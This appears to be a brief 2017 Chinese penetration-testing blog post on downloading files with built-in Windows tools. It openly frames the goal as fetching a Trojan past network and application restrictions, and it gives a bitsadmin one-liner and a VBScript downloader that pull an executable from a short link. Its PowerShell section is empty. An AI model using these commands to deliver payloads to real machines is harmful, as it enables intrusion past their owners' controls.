使用Windows內建命令行程序來实现HTTP文件下載

發表於 2017-03-09   |   分類於 信息安全   |  

使用说明

在特定的渗透环境中,可能存在不能ping(封锁ICMP协议)以及无法使用浏览器上网(禁用应用程序)等。
可以通过一些命令行方式绕过限制,下载Torjan,比如使用bits admin 工具, powershell 或者 vbs。

方式

BitsAdmin Tool (支援Windows XP SP2/SP3、Windows 7/8)

http://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx

範例:
bitsadmin /transfer ChromeDownloadjob /download /priority normal http://goo.gl/IC32jN %UserProfile%\Desktop\ChromeSetup.exe

WScript 解析 VBS

範例:(另存成download.vbs來執行)

1
2
3
4
5
6
7
8
9
10
11
12
13
Download "http://goo.gl/IC32jN", "ChromeSetup.exe"
Function Download(strUrl, strFile)
Set xHttp = CreateObject("MSXML2.ServerXMLHTTP")
xHttp.Open "GET", strUrl,0
xHttp.Send()
Set bStrm= CreateObject("ADODB.Stream")
with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile strFile, 2 '//overwrite
end with
End Function

Powershell

其他

從隨身碟使用第三方命令列軟體

参考资料

[1] 使用Windows內建命令列程式來實現HTTP檔案下載

常見的有Wget、cURL

#渗透测试
Show Me the Money! Finding Flawed Implementations of Third-party In-app Payment in Android Apps
Vault 7 Year Zero Wikileaks leaks CIA classified documents